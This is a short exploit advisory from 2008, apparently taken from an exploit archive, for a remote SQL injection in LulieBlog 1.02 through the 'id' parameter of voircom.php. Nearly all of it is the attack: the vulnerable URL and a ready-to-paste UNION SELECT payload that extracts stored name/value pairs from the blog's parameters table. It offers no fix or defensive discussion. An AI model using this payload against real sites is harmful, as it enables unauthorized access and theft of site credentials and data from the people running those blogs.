id: 2540
date: 01/23/2008
title: LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
author: IRCRASH
cves: 

==================================================================
LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
==================================================================




#####################################################################################
####              LulieBlog Version 1.02 Remote Sql Injection                    ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (Dr.Crash)                                                        #
#                                                                                   #
#                                                                                   #
#Injection Adress :  http://Sitename/voircom.php?id=[SQL CODE]                      #
#                                                                                   #
#                                                                                   #
#[SQL CODE] : -1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
#                                                                                   #
#                                                                                   #
#####################################################################################



#  0day.today [2023-03-23]  #